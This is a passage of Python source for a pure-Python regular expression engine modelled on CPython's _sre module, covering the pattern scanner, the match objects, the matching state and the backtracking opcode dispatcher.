"""Return the tuple (new_string, number_of_subs_made) found by replacing
the leftmost non-overlapping occurrences of pattern with the replacement
repl."""
return self._subx(repl, string, count, True)
def split(self, string, maxsplit=0):
"""Split string by the occurrences of pattern."""
splitlist = []
state = _State(string, 0, sys.maxsize, self.flags)
n = 0
last = state.start
while not maxsplit or n < maxsplit:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
if state.start == state.string_position: # zero-width match
if last == state.end: # or end of string
break
state.start += 1
continue
splitlist.append(string[last:state.start])
# add groups (if any)
if self.groups:
match = SRE_Match(self, state)
splitlist.extend(list(match.groups(None)))
n += 1
last = state.start = state.string_position
splitlist.append(string[last:state.end])
return splitlist
def finditer(self, string, pos=0, endpos=sys.maxsize):
"""Return a list of all non-overlapping matches of pattern in string."""
#scanner = self.scanner(string, pos, endpos)
_list=[]
_m=self.scanner(string, pos, endpos)
_re=SRE_Scanner(self, string, pos, endpos)
_m=_re.search()
while _m:
_list.append(_m)
_m=_re.search()
return _list
#return iter(scanner.search, None)
def scanner(self, string, start=0, end=sys.maxsize):
return SRE_Scanner(self, string, start, end)
def __copy__(self):
raise TypeError("cannot copy this pattern object")
def __deepcopy__(self):
raise TypeError("cannot copy this pattern object")
class SRE_Scanner:
    """Stateful scanner over a subject string (the undocumented
    ``pattern.scanner()`` interface).

    Each call to :meth:`match` or :meth:`search` resumes from where the
    previous successful call left off.
    """

    def __init__(self, pattern, string, start, end):
        self.pattern = pattern
        self._state = _State(string, start, end, self.pattern.flags)

    def _match_search(self, matcher):
        """Run *matcher* once from the current position, then advance."""
        current = self._state
        current.reset()
        current.string_position = current.start
        found = SRE_Match(self.pattern, current) if matcher(self.pattern._code) else None
        # Step forward: past the match when it consumed characters, or by a
        # single character after a failure / zero-width match so the scanner
        # cannot get stuck in place.
        if found is not None and current.string_position != current.start:
            current.start = current.string_position
        else:
            current.start += 1
        return found

    def match(self):
        """Anchored attempt at the current position."""
        return self._match_search(self._state.match)

    def search(self):
        """Unanchored attempt from the current position."""
        return self._match_search(self._state.search)
class SRE_Match:
    """Result of a successful match, mirroring ``_sre.SRE_Match``.

    Attributes:
        re:      the SRE_Pattern that produced this match.
        string:  the subject string.
        pos/endpos: the search window that was in effect.
        regs:    tuple of (start, end) index pairs; entry 0 spans the whole
                 match, entry i spans group i, (-1, -1) for a group that
                 did not participate.
        lastindex/lastgroup: index / name of the last matched group (None
                 if no group matched).
    """

    def __init__(self, pattern, state):
        self.re = pattern
        self.string = state.string
        self.pos = state.pos
        self.endpos = state.end
        self.lastindex = state.lastindex
        if self.lastindex < 0:
            # -1 sentinel from _State means "no group matched"
            self.lastindex = None
        self.regs = self._create_regs(state)
        #statement below is not valid under python3 ( 0 <= None)
        #if pattern._indexgroup and 0 <= self.lastindex < len(pattern._indexgroup):
        if self.lastindex is not None and pattern._indexgroup and 0 <= self.lastindex < len(pattern._indexgroup):
            # The above upper-bound check should not be necessary, as the re
            # compiler is supposed to always provide an _indexgroup list long
            # enough. But the re.Scanner class seems to screw up something
            # there, test_scanner in test_re won't work without upper-bound
            # checking. XXX investigate this and report bug to CPython.
            self.lastgroup = pattern._indexgroup[self.lastindex]
        else:
            self.lastgroup = None

    def _create_regs(self, state):
        """Creates a tuple of index pairs representing matched groups."""
        regs = [(state.start, state.string_position)]
        for group in range(self.re.groups):
            mark_index = 2 * group
            if mark_index + 1 < len(state.marks) \
                    and state.marks[mark_index] is not None \
                    and state.marks[mark_index + 1] is not None:
                regs.append((state.marks[mark_index], state.marks[mark_index + 1]))
            else:
                # group did not participate in the match
                regs.append((-1, -1))
        return tuple(regs)

    def _get_index(self, group):
        """Resolve a group index or group name to a numeric index.

        Raises IndexError for an unknown name or out-of-range index."""
        if isinstance(group, int):
            if group >= 0 and group <= self.re.groups:
                return group
        else:
            if group in self.re.groupindex:
                return self.re.groupindex[group]
        raise IndexError("no such group")

    def _get_slice(self, group, default):
        """Return the substring for a numeric group, or *default* when the
        group did not participate in the match."""
        group_indices = self.regs[group]
        if group_indices[0] >= 0:
            return self.string[group_indices[0]:group_indices[1]]
        else:
            return default

    def start(self, group=0):
        """Returns the indices of the start of the substring matched by group;
        group defaults to zero (meaning the whole matched substring). Returns -1
        if group exists but did not contribute to the match."""
        return self.regs[self._get_index(group)][0]

    def end(self, group=0):
        """Returns the indices of the end of the substring matched by group;
        group defaults to zero (meaning the whole matched substring). Returns -1
        if group exists but did not contribute to the match."""
        return self.regs[self._get_index(group)][1]

    def span(self, group=0):
        """Returns the 2-tuple (m.start(group), m.end(group))."""
        return self.start(group), self.end(group)

    def expand(self, template):
        """Return the string obtained by doing backslash substitution and
        resolving group references on template."""
        # BUG FIX: 'import sre' fails on Python 3 (the module was renamed);
        # use the same aliased import that SRE_Pattern._subx already uses.
        import re as sre
        return sre._expand(self.re, self, template)

    def groups(self, default=None):
        """Returns a tuple containing all the subgroups of the match. The
        default argument is used for groups that did not participate in the
        match (defaults to None)."""
        groups = []
        for indices in self.regs[1:]:
            if indices[0] >= 0:
                groups.append(self.string[indices[0]:indices[1]])
            else:
                groups.append(default)
        return tuple(groups)

    def groupdict(self, default=None):
        """Return a dictionary containing all the named subgroups of the match.
        The default argument is used for groups that did not participate in the
        match (defaults to None)."""
        groupdict = {}
        for key, value in self.re.groupindex.items():
            groupdict[key] = self._get_slice(value, default)
        return groupdict

    def group(self, *args):
        """Returns one or more subgroups of the match. Each argument is either a
        group index or a group name."""
        if len(args) == 0:
            args = (0,)
        grouplist = []
        for group in args:
            grouplist.append(self._get_slice(self._get_index(group), None))
        if len(grouplist) == 1:
            return grouplist[0]
        else:
            return tuple(grouplist)

    def __copy__(self):
        # BUG FIX: previously defined without 'self', so copy.copy() raised
        # a confusing argument-count TypeError; raise the intended one.
        raise TypeError("cannot copy this match object")

    def __deepcopy__(self, memo):
        # BUG FIX: the deepcopy protocol passes a memo dict; accept it so
        # the intended TypeError is raised instead of a signature error.
        raise TypeError("cannot copy this match object")
class _State:
    """Mutable matching state for one match attempt.

    Holds the subject string, the active [start, end) window, the group
    mark list, and the interpreter's context/repeat stacks.  The same
    _State is reused (via reset()) while scanning forward in findall,
    sub and split.
    """

    def __init__(self, string, start, end, flags):
        self.string = string
        # Clamp the requested window to the actual string bounds.
        if start < 0:
            start = 0
        if end > len(string):
            end = len(string)
        self.start = start
        self.string_position = self.start  # current cursor in the subject
        self.end = end
        self.pos = start                   # original start, kept for SRE_Match.pos
        self.flags = flags
        self.reset()

    def reset(self):
        """Clear per-attempt state (marks, stacks, repeat chain)."""
        self.marks = []
        self.lastindex = -1
        self.marks_stack = []
        self.context_stack = []
        self.repeat = None

    def match(self, pattern_codes):
        """Run the opcode interpreter anchored at the current position.

        Drives the context stack: contexts suspended on a child (dispatch
        returned None) are left on the stack and resumed later.  Returns
        the final has_matched verdict of the root context.
        """
        # Optimization: Check string length. pattern_codes[3] contains the
        # minimum length for a string to possibly match.
        # brython.. the optimization doesn't work
        #if pattern_codes[0] == OPCODES["info"] and pattern_codes[3]:
        #    if self.end - self.string_position < pattern_codes[3]:
        #        #_log("reject (got %d chars, need %d)"
        #        #    % (self.end - self.string_position, pattern_codes[3]))
        #        return False
        dispatcher = _OpcodeDispatcher()
        self.context_stack.append(_MatchContext(self, pattern_codes))
        has_matched = None
        while len(self.context_stack) > 0:
            context = self.context_stack[-1]
            has_matched = dispatcher.match(context)
            if has_matched is not None: # don't pop if context isn't done
                self.context_stack.pop()
        return has_matched

    def search(self, pattern_codes):
        """Unanchored search: try match() at successive start positions,
        using the compiled INFO/LITERAL prefix hints when present."""
        flags = 0
        if pattern_codes[0] == OPCODES["info"]:
            # optimization info block
            # <INFO> <1=skip> <2=flags> <3=min> <4=max> <5=prefix info>
            if pattern_codes[2] & SRE_INFO_PREFIX and pattern_codes[5] > 1:
                return self.fast_search(pattern_codes)
            flags = pattern_codes[2]
            pattern_codes = pattern_codes[pattern_codes[1] + 1:]
        string_position = self.start
        if pattern_codes[0] == OPCODES["literal"]:
            # Special case: Pattern starts with a literal character. This is
            # used for short prefixes
            character = pattern_codes[1]
            while True:
                # skip ahead to the next occurrence of the literal
                while string_position < self.end \
                        and ord(self.string[string_position]) != character:
                    string_position += 1
                if string_position >= self.end:
                    return False
                self.start = string_position
                string_position += 1
                self.string_position = string_position
                if flags & SRE_INFO_LITERAL:
                    # pattern is the literal itself: found it, done
                    return True
                if self.match(pattern_codes[2:]):
                    return True
            return False  # not reached: the loop above always returns
        # General case
        while string_position <= self.end:
            self.reset()
            self.start = self.string_position = string_position
            if self.match(pattern_codes):
                return True
            string_position += 1
        return False

    def fast_search(self, pattern_codes):
        """Skips forward in a string as fast as possible using information from
        an optimization info block."""
        # pattern starts with a known prefix
        # <5=length> <6=skip> <7=prefix data> <overlap data>
        flags = pattern_codes[2]
        prefix_len = pattern_codes[5]
        prefix_skip = pattern_codes[6] # don't really know what this is good for
        prefix = pattern_codes[7:7 + prefix_len]
        overlap = pattern_codes[7 + prefix_len - 1:pattern_codes[1] + 1]
        pattern_codes = pattern_codes[pattern_codes[1] + 1:]
        i = 0
        string_position = self.string_position
        # Knuth-Morris-Pratt style scan: 'overlap' tells how far to fall
        # back in the prefix on a mismatch.
        while string_position < self.end:
            while True:
                if ord(self.string[string_position]) != prefix[i]:
                    if i == 0:
                        break
                    else:
                        i = overlap[i]
                else:
                    i += 1
                    if i == prefix_len:
                        # found a potential match
                        self.start = string_position + 1 - prefix_len
                        self.string_position = string_position + 1 \
                                - prefix_len + prefix_skip
                        if flags & SRE_INFO_LITERAL:
                            return True # matched all of pure literal pattern
                        if self.match(pattern_codes[2 * prefix_skip:]):
                            return True
                        i = overlap[i]
                    break
            string_position += 1
        return False

    def set_mark(self, mark_nr, position):
        """Record a group boundary; even mark numbers open a group, odd
        ones close it (and update lastindex)."""
        if mark_nr & 1:
            # This id marks the end of a group.
            # fix python 3 division incompatability
            #self.lastindex = mark_nr / 2 + 1
            self.lastindex = mark_nr // 2 + 1
        if mark_nr >= len(self.marks):
            # grow the marks list on demand, padding with None
            self.marks.extend([None] * (mark_nr - len(self.marks) + 1))
        self.marks[mark_nr] = position

    def get_marks(self, group_index):
        """Return the (open, close) marks for a group, or (None, None)."""
        marks_index = 2 * group_index
        if len(self.marks) > marks_index + 1:
            return self.marks[marks_index], self.marks[marks_index + 1]
        else:
            return None, None

    def marks_push(self):
        # Snapshot marks + lastindex for backtracking.
        self.marks_stack.append((self.marks[:], self.lastindex))

    def marks_pop(self):
        # Restore and discard the latest snapshot.
        self.marks, self.lastindex = self.marks_stack.pop()

    def marks_pop_keep(self):
        # Restore the latest snapshot but keep it on the stack.
        self.marks, self.lastindex = self.marks_stack[-1]

    def marks_pop_discard(self):
        # Drop the latest snapshot without restoring it.
        self.marks_stack.pop()

    def lower(self, char_ord):
        """Flag-aware lowercasing used by the IGNORE opcodes."""
        return getlower(char_ord, self.flags)
class _MatchContext:
def __init__(self, state, pattern_codes):
self.state = state
self.pattern_codes = pattern_codes
self.string_position = state.string_position
self.code_position = 0
self.has_matched = None
def push_new_context(self, pattern_offset):
"""Creates a new child context of this context and pushes it on the
stack. pattern_offset is the offset off the current code position to
start interpreting from."""
child_context = _MatchContext(self.state,
self.pattern_codes[self.code_position + pattern_offset:])
#print("_sre.py:517:pushing new context") #, child_context.has_matched)
#print(self.state.string_position)
#print(self.pattern_codes[self.code_position + pattern_offset:])
#print(pattern_offset)
self.state.context_stack.append(child_context)
return child_context
def peek_char(self, peek=0):
return self.state.string[self.string_position + peek]
def skip_char(self, skip_count):
self.string_position += skip_count
def remaining_chars(self):
return self.state.end - self.string_position
def peek_code(self, peek=0):
return self.pattern_codes[self.code_position + peek]
def skip_code(self, skip_count):
self.code_position += skip_count
def remaining_codes(self):
return len(self.pattern_codes) - self.code_position
def at_beginning(self):
return self.string_position == 0
def at_end(self):
return self.string_position == self.state.end
def at_linebreak(self):
return not self.at_end() and _is_linebreak(self.peek_char())
def at_boundary(self, word_checker):
if self.at_beginning() and self.at_end():
return False
that = not self.at_beginning() and word_checker(self.peek_char(-1))
this = not self.at_end() and word_checker(self.peek_char())
return this != that
class _RepeatContext(_MatchContext):
    """Context for a <REPEAT> ... <MAX_UNTIL>/<MIN_UNTIL> construct.

    Repeat contexts form a linked list through ``previous`` so nested
    repeats can be restored when an inner one finishes."""

    def __init__(self, context):
        # Interpret starting from the parent's current code position.
        _MatchContext.__init__(self, context.state,
                               context.pattern_codes[context.code_position:])
        self.count = -1                        # completed repetitions so far
        self.previous = context.state.repeat   # enclosing repeat, if any
        self.last_position = None              # guards against zero-width loops
class _Dispatcher:
DISPATCH_TABLE = None
def dispatch(self, code, context):
method = self.DISPATCH_TABLE.get(code, self.__class__.unknown)
return method(self, context)
def unknown(self, code, ctx):
raise NotImplementedError()
def build_dispatch_table(cls, code_dict, method_prefix):
if cls.DISPATCH_TABLE is not None:
return
table = {}
for key, value in code_dict.items():
if hasattr(cls, "%s%s" % (method_prefix, key)):
table[value] = getattr(cls, "%s%s" % (method_prefix, key))
cls.DISPATCH_TABLE = table
build_dispatch_table = classmethod(build_dispatch_table)
class _OpcodeDispatcher(_Dispatcher):
    """Interprets the compiled opcode stream for _MatchContext frames.

    Handlers that must wait for a child context use generators: they
    ``yield False`` to suspend (the engine matches the child pushed on
    the context stack, then resumes the generator via dispatch()) and
    ``yield True`` once the context's has_matched is decided.  Plain
    handlers return True when the context is done.
    """

    def __init__(self):
        self.executing_contexts = {}   # id(context) -> suspended generator
        self.at_dispatcher = _AtcodeDispatcher()
        self.ch_dispatcher = _ChcodeDispatcher()
        self.set_dispatcher = _CharsetDispatcher()

    def match(self, context):
        """Returns True if the current context matches, False if it doesn't and
        None if matching is not finished, ie must be resumed after child
        contexts have been matched."""
        while context.remaining_codes() > 0 and context.has_matched is None:
            opcode = context.peek_code()
            if not self.dispatch(opcode, context):
                return None
        if context.has_matched is None:
            context.has_matched = False
        return context.has_matched

    def dispatch(self, opcode, context):
        """Dispatches a context on a given opcode. Returns True if the context
        is done matching, False if it must be resumed when next encountered."""
        #if self.executing_contexts.has_key(id(context)):
        if id(context) in self.executing_contexts:
            # resume a previously suspended generator handler
            generator = self.executing_contexts[id(context)]
            del self.executing_contexts[id(context)]
            has_finished = next(generator)
        else:
            method = self.DISPATCH_TABLE.get(opcode, _OpcodeDispatcher.unknown)
            has_finished = method(self, context)
            if hasattr(has_finished, "__next__"): # avoid using the types module
                # handler is a generator: advance it to its first yield
                generator = has_finished
                has_finished = next(generator)
        if not has_finished:
            self.executing_contexts[id(context)] = generator
        return has_finished

    def op_success(self, ctx):
        # end of pattern
        #self._log(ctx, "SUCCESS")
        ctx.state.string_position = ctx.string_position
        ctx.has_matched = True
        return True

    def op_failure(self, ctx):
        # immediate failure
        #self._log(ctx, "FAILURE")
        ctx.has_matched = False
        return True

    def general_op_literal(self, ctx, compare, decorate=lambda x: x):
        # Shared body for the four LITERAL variants; 'decorate' lowercases
        # for the IGNORE forms, 'compare' is eq or ne.
        #print(ctx.peek_char())
        if ctx.at_end() or not compare(decorate(ord(ctx.peek_char())),
                decorate(ctx.peek_code(1))):
            ctx.has_matched = False
        ctx.skip_code(2)
        ctx.skip_char(1)

    def op_literal(self, ctx):
        # match literal string
        # <LITERAL> <code>
        #self._log(ctx, "LITERAL", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.eq)
        return True

    def op_not_literal(self, ctx):
        # match anything that is not the given literal character
        # <NOT_LITERAL> <code>
        #self._log(ctx, "NOT_LITERAL", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.ne)
        return True

    def op_literal_ignore(self, ctx):
        # match literal regardless of case
        # <LITERAL_IGNORE> <code>
        #self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.eq, ctx.state.lower)
        return True

    def op_not_literal_ignore(self, ctx):
        # match literal regardless of case
        # <LITERAL_IGNORE> <code>
        #self._log(ctx, "LITERAL_IGNORE", ctx.peek_code(1))
        self.general_op_literal(ctx, operator.ne, ctx.state.lower)
        return True

    def op_at(self, ctx):
        # match at given position
        # <AT> <code>
        #self._log(ctx, "AT", ctx.peek_code(1))
        if not self.at_dispatcher.dispatch(ctx.peek_code(1), ctx):
            ctx.has_matched = False
            #print('_sre.py:line693, update context.has_matched variable')
            return True
        ctx.skip_code(2)
        return True

    def op_category(self, ctx):
        # match at given category
        # <CATEGORY> <code>
        #self._log(ctx, "CATEGORY", ctx.peek_code(1))
        if ctx.at_end() or not self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
            ctx.has_matched = False
            #print('_sre.py:line703, update context.has_matched variable')
            return True
        ctx.skip_code(2)
        ctx.skip_char(1)
        return True

    def op_any(self, ctx):
        # match anything (except a newline)
        # <ANY>
        #self._log(ctx, "ANY")
        if ctx.at_end() or ctx.at_linebreak():
            ctx.has_matched = False
            #print('_sre.py:line714, update context.has_matched variable')
            return True
        ctx.skip_code(1)
        ctx.skip_char(1)
        return True

    def op_any_all(self, ctx):
        # match anything
        # <ANY_ALL>
        #self._log(ctx, "ANY_ALL")
        if ctx.at_end():
            ctx.has_matched = False
            #print('_sre.py:line725, update context.has_matched variable')
            return True
        ctx.skip_code(1)
        ctx.skip_char(1)
        return True

    def general_op_in(self, ctx, decorate=lambda x: x):
        # Shared body for IN / IN_IGNORE: test the current character
        # against the embedded character set.
        #self._log(ctx, "OP_IN")
        #print('general_op_in')
        if ctx.at_end():
            ctx.has_matched = False
            #print('_sre.py:line734, update context.has_matched variable')
            return
        skip = ctx.peek_code(1)
        ctx.skip_code(2) # set op pointer to the set code
        #print(ctx.peek_char(), ord(ctx.peek_char()),
        #    decorate(ord(ctx.peek_char())))
        if not self.check_charset(ctx, decorate(ord(ctx.peek_char()))):
            #print('_sre.py:line738, update context.has_matched variable')
            ctx.has_matched = False
            return
        ctx.skip_code(skip - 1)
        ctx.skip_char(1)
        #print('end:general_op_in')

    def op_in(self, ctx):
        # match set member (or non_member)
        # <IN> <skip> <set>
        #self._log(ctx, "OP_IN")
        self.general_op_in(ctx)
        return True

    def op_in_ignore(self, ctx):
        # match set member (or non_member), disregarding case of current char
        # <IN_IGNORE> <skip> <set>
        #self._log(ctx, "OP_IN_IGNORE")
        self.general_op_in(ctx, ctx.state.lower)
        return True

    def op_jump(self, ctx):
        # jump forward
        # <JUMP> <offset>
        #self._log(ctx, "JUMP", ctx.peek_code(1))
        ctx.skip_code(ctx.peek_code(1) + 1)
        return True

    # skip info
    # <INFO> <skip>
    op_info = op_jump

    def op_mark(self, ctx):
        # set mark
        # <MARK> <gid>
        #self._log(ctx, "OP_MARK", ctx.peek_code(1))
        ctx.state.set_mark(ctx.peek_code(1), ctx.string_position)
        ctx.skip_code(2)
        return True

    def op_branch(self, ctx):
        # alternation
        # <BRANCH> <0=skip> code <JUMP> ... <NULL>
        #self._log(ctx, "BRANCH")
        ctx.state.marks_push()
        ctx.skip_code(1)
        current_branch_length = ctx.peek_code(0)
        while current_branch_length:
            # The following tries to shortcut branches starting with a
            # (unmatched) literal. _sre.c also shortcuts charsets here.
            if not (ctx.peek_code(1) == OPCODES["literal"] and \
                    (ctx.at_end() or ctx.peek_code(2) != ord(ctx.peek_char()))):
                ctx.state.string_position = ctx.string_position
                child_context = ctx.push_new_context(1)
                #print("_sre.py:803:op_branch")
                yield False
                if child_context.has_matched:
                    ctx.has_matched = True
                    yield True
                ctx.state.marks_pop_keep()
            ctx.skip_code(current_branch_length)
            current_branch_length = ctx.peek_code(0)
        ctx.state.marks_pop_discard()
        ctx.has_matched = False
        #print('_sre.py:line805, update context.has_matched variable')
        yield True

    def op_repeat_one(self, ctx):
        # match repeated sequence (maximizing).
        # this operator only works if the repeated item is exactly one character
        # wide, and we're not already collecting backtracking points.
        # <REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
        mincount = ctx.peek_code(2)
        maxcount = ctx.peek_code(3)
        #print("repeat one", mincount, maxcount)
        #self._log(ctx, "REPEAT_ONE", mincount, maxcount)
        if ctx.remaining_chars() < mincount:
            ctx.has_matched = False
            yield True
        ctx.state.string_position = ctx.string_position
        # greedily consume as many items as possible, then backtrack
        count = self.count_repetitions(ctx, maxcount)
        ctx.skip_char(count)
        if count < mincount:
            ctx.has_matched = False
            yield True
        if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
            # tail is empty. we're finished
            ctx.state.string_position = ctx.string_position
            ctx.has_matched = True
            yield True
        ctx.state.marks_push()
        if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["literal"]:
            # Special case: Tail starts with a literal. Skip positions where
            # the rest of the pattern cannot possibly match.
            char = ctx.peek_code(ctx.peek_code(1) + 2)
            while True:
                while count >= mincount and \
                        (ctx.at_end() or ord(ctx.peek_char()) != char):
                    ctx.skip_char(-1)
                    count -= 1
                if count < mincount:
                    break
                ctx.state.string_position = ctx.string_position
                child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
                #print("_sre.py:856:push_new_context")
                yield False
                if child_context.has_matched:
                    ctx.has_matched = True
                    yield True
                ctx.skip_char(-1)
                count -= 1
                ctx.state.marks_pop_keep()
        else:
            # General case: backtracking
            while count >= mincount:
                ctx.state.string_position = ctx.string_position
                child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
                yield False
                if child_context.has_matched:
                    ctx.has_matched = True
                    yield True
                ctx.skip_char(-1)
                count -= 1
                ctx.state.marks_pop_keep()
        ctx.state.marks_pop_discard()
        ctx.has_matched = False
        #ctx.has_matched = True # <== this should be True (so match object gets returned to program)
        yield True

    def op_min_repeat_one(self, ctx):
        # match repeated sequence (minimizing)
        # <MIN_REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
        mincount = ctx.peek_code(2)
        maxcount = ctx.peek_code(3)
        #self._log(ctx, "MIN_REPEAT_ONE", mincount, maxcount)
        if ctx.remaining_chars() < mincount:
            ctx.has_matched = False
            yield True
        ctx.state.string_position = ctx.string_position
        if mincount == 0:
            count = 0
        else:
            count = self.count_repetitions(ctx, mincount)
            if count < mincount:
                ctx.has_matched = False
                #print('_sre.py:line891, update context.has_matched variable')
                yield True
            ctx.skip_char(count)
        if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
            # tail is empty. we're finished
            ctx.state.string_position = ctx.string_position
            ctx.has_matched = True
            yield True
        # lazily add one item at a time, retrying the tail after each
        ctx.state.marks_push()
        while maxcount == MAXREPEAT or count <= maxcount:
            ctx.state.string_position = ctx.string_position
            child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
            #print('_sre.py:916:push new context')
            yield False
            if child_context.has_matched:
                ctx.has_matched = True
                yield True
            ctx.state.string_position = ctx.string_position
            if self.count_repetitions(ctx, 1) == 0:
                break
            ctx.skip_char(1)
            count += 1
            ctx.state.marks_pop_keep()
        ctx.state.marks_pop_discard()
        ctx.has_matched = False
        yield True

    def op_repeat(self, ctx):
        # create repeat context. all the hard work is done by the UNTIL
        # operator (MAX_UNTIL, MIN_UNTIL)
        # <REPEAT> <skip> <1=min> <2=max> item <UNTIL> tail
        #self._log(ctx, "REPEAT", ctx.peek_code(2), ctx.peek_code(3))
        #if ctx.state.repeat is None:
        #    print("951:ctx.state.repeat is None")
        #    #ctx.state.repeat=_RepeatContext(ctx)
        repeat = _RepeatContext(ctx)
        ctx.state.repeat = repeat
        ctx.state.string_position = ctx.string_position
        child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
        #print("_sre.py:941:push new context", id(child_context))
        #print(child_context.state.repeat)
        #print(ctx.state.repeat)
        # are these two yields causing the issue?
        yield False
        # child done: restore the enclosing repeat and propagate the verdict
        ctx.state.repeat = repeat.previous
        ctx.has_matched = child_context.has_matched
        yield True

    def op_max_until(self, ctx):
        # maximizing repeat
        # <REPEAT> <skip> <1=min> <2=max> item <MAX_UNTIL> tail
        repeat = ctx.state.repeat
        #print("op_max_until") #, id(ctx.state.repeat))
        if repeat is None:
            #print(id(ctx), id(ctx.state))
            raise RuntimeError("Internal re error: MAX_UNTIL without REPEAT.")
        mincount = repeat.peek_code(2)
        maxcount = repeat.peek_code(3)
        ctx.state.string_position = ctx.string_position
        count = repeat.count + 1
        #self._log(ctx, "MAX_UNTIL", count)
        if count < mincount:
            # not enough matches
            repeat.count = count
            child_context = repeat.push_new_context(4)
            yield False
            ctx.has_matched = child_context.has_matched
            if not ctx.has_matched:
                repeat.count = count - 1
                ctx.state.string_position = ctx.string_position
            yield True
        if (count < maxcount or maxcount == MAXREPEAT) \
                and ctx.state.string_position != repeat.last_position:
            # we may have enough matches, if we can match another item, do so
            repeat.count = count
            ctx.state.marks_push()
            save_last_position = repeat.last_position # zero-width match protection
            repeat.last_position = ctx.state.string_position
            child_context = repeat.push_new_context(4)
            yield False
            repeat.last_position = save_last_position
            if child_context.has_matched:
                ctx.state.marks_pop_discard()
                ctx.has_matched = True
                yield True
            ctx.state.marks_pop()
            repeat.count = count - 1
            ctx.state.string_position = ctx.string_position
        # cannot match more repeated items here. make sure the tail matches
        ctx.state.repeat = repeat.previous
        child_context = ctx.push_new_context(1)
        #print("_sre.py:987:op_max_until")
        yield False
        ctx.has_matched = child_context.has_matched
        if not ctx.has_matched:
            ctx.state.repeat = repeat
            ctx.state.string_position = ctx.string_position
        yield True

    def op_min_until(self, ctx):
        # minimizing repeat
        # <REPEAT> <skip> <1=min> <2=max> item <MIN_UNTIL> tail
        repeat = ctx.state.repeat
        if repeat is None:
            raise RuntimeError("Internal re error: MIN_UNTIL without REPEAT.")
        mincount = repeat.peek_code(2)
        maxcount = repeat.peek_code(3)
        ctx.state.string_position = ctx.string_position
        count = repeat.count + 1
        #self._log(ctx, "MIN_UNTIL", count)
        if count < mincount:
            # not enough matches
            repeat.count = count
            child_context = repeat.push_new_context(4)
            yield False
            ctx.has_matched = child_context.has_matched
            if not ctx.has_matched:
                repeat.count = count - 1
                ctx.state.string_position = ctx.string_position
            yield True
        # see if the tail matches
        ctx.state.marks_push()
        ctx.state.repeat = repeat.previous
        child_context = ctx.push_new_context(1)
        #print('_sre.py:1022:push new context')
        yield False
        if child_context.has_matched:
            ctx.has_matched = True
            yield True
        ctx.state.repeat = repeat
        ctx.state.string_position = ctx.string_position
        ctx.state.marks_pop()
        # match more until tail matches
        if count >= maxcount and maxcount != MAXREPEAT:
            ctx.has_matched = False
            #print('_sre.py:line1022, update context.has_matched variable')
            yield True
        repeat.count = count
        child_context = repeat.push_new_context(4)
        yield False
        ctx.has_matched = child_context.has_matched
        if not ctx.has_matched:
            repeat.count = count - 1
            ctx.state.string_position = ctx.string_position
        yield True

    def general_op_groupref(self, ctx, decorate=lambda x: x):
        # Shared body for GROUPREF / GROUPREF_IGNORE: compare the text at
        # the cursor with the text already captured by the group.
        group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
        if group_start is None or group_end is None or group_end < group_start:
            ctx.has_matched = False
            return True
        while group_start < group_end:
            if ctx.at_end() or decorate(ord(ctx.peek_char())) \
                    != decorate(ord(ctx.state.string[group_start])):
                ctx.has_matched = False
                #print('_sre.py:line1042, update context.has_matched variable')
                return True
            group_start += 1
            ctx.skip_char(1)
        ctx.skip_code(2)
        return True

    def op_groupref(self, ctx):
        # match backreference
        # <GROUPREF> <zero-based group index>
        #self._log(ctx, "GROUPREF", ctx.peek_code(1))
        return self.general_op_groupref(ctx)

    def op_groupref_ignore(self, ctx):
        # match backreference case-insensitive
        # <GROUPREF_IGNORE> <zero-based group index>
        #self._log(ctx, "GROUPREF_IGNORE", ctx.peek_code(1))
        return self.general_op_groupref(ctx, ctx.state.lower)

    def op_groupref_exists(self, ctx):
        # conditional: take codeyes if the group matched, codeno otherwise
        # <GROUPREF_EXISTS> <group> <skip> codeyes <JUMP> codeno ...
        #self._log(ctx, "GROUPREF_EXISTS", ctx.peek_code(1))
        group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
        if group_start is None or group_end is None or group_end < group_start:
            ctx.skip_code(ctx.peek_code(2) + 1)
        else:
            ctx.skip_code(3)
        return True

    def op_assert(self, ctx):
        # assert subpattern (lookahead/lookbehind)
        # <ASSERT> <skip> <back> <pattern>
        #self._log(ctx, "ASSERT", ctx.peek_code(2))
        ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
        if ctx.state.string_position < 0:
            # lookbehind would start before the string: cannot match
            ctx.has_matched = False
            yield True
        child_context = ctx.push_new_context(3)
        yield False
        if child_context.has_matched:
            ctx.skip_code(ctx.peek_code(1) + 1)
        else:
            ctx.has_matched = False
        yield True

    def op_assert_not(self, ctx):
        # assert not subpattern (negative lookahead/lookbehind)
        # <ASSERT_NOT> <skip> <back> <pattern>
        #self._log(ctx, "ASSERT_NOT", ctx.peek_code(2))
        ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
        if ctx.state.string_position >= 0:
            child_context = ctx.push_new_context(3)
            yield False
            if child_context.has_matched:
                ctx.has_matched = False
                yield True
        ctx.skip_code(ctx.peek_code(1) + 1)
        yield True

    def unknown(self, ctx):
        #self._log(ctx, "UNKNOWN", ctx.peek_code())
        raise RuntimeError("Internal re error. Unknown opcode: %s" % ctx.peek_code())

    def check_charset(self, ctx, char):
        """Checks whether a character matches set of arbitrary length. Assumes
        the code pointer is at the first member of the set."""
        self.set_dispatcher.reset(char)
        save_position = ctx.code_position
        result = None
        # set_* handlers return None to keep scanning set members
        while result is None:
            result = self.set_dispatcher.dispatch(ctx.peek_code(), ctx)
        ctx.code_position = save_position
        #print("_sre.py:1123:check_charset", result)
        return result

    def count_repetitions(self, ctx, maxcount):
        """Returns the number of repetitions of a single item, starting from the
        current string position. The code pointer is expected to point to a
        REPEAT_ONE operation (with the repeated 4 ahead)."""
        count = 0
        real_maxcount = ctx.state.end - ctx.string_position
